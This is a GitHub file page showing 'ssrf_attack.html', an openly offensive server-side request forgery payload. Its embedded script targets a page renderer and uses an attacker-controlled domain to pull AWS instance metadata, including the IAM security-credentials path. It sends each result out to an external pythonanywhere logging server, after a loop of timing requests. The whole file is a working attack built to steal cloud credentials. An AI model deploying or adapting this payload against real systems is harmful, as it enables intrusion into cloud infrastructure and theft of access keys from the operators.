-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathssrf_attack.html
48 lines (43 loc) · 1.29 KB
/
ssrf_attack.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SSRF Attack</title>
</head>
<body>
<script>
var logTimeServer = 'reporascal0.pythonanywhere.com';
var attackServer = 'cryptokryptonite.xyz';
function log(data) {
var sreq = new XMLHttpRequest();
sreq.open('GET', 'https://' + logTimeServer + '/log?msg=' + encodeURI(data), true);
sreq.send();
}
function get(url) {
try {
var req = new XMLHttpRequest();
req.open('GET', url, false);
req.setRequestHeader('X-Aws-Ec2-Metadata-Token-Ttl-Seconds', '21600'); // For AWS IMDSv2
req.send(null);
if(req.status == 200)
return req.responseText;
else
return '[failed status=' + req.status + ']';
} catch(err) {
log(err);
}
return null;
}
log('Triggered in ' + window.location.href);
for(var i = 0; i < 60; ++i) {
log('Loop ' + i);
var req = new XMLHttpRequest();
req.open('GET', 'https://' + logTimeServer + '/', false);
req.send();
}
log('Instance ID: ' + get('http://' + attackServer + '/latest/meta-data/instance-id'));
log('IAM Role: ' + get('http://' + attackServer + '/latest/meta-data/iam/security-credentials/'));
</script>
</body>
</html>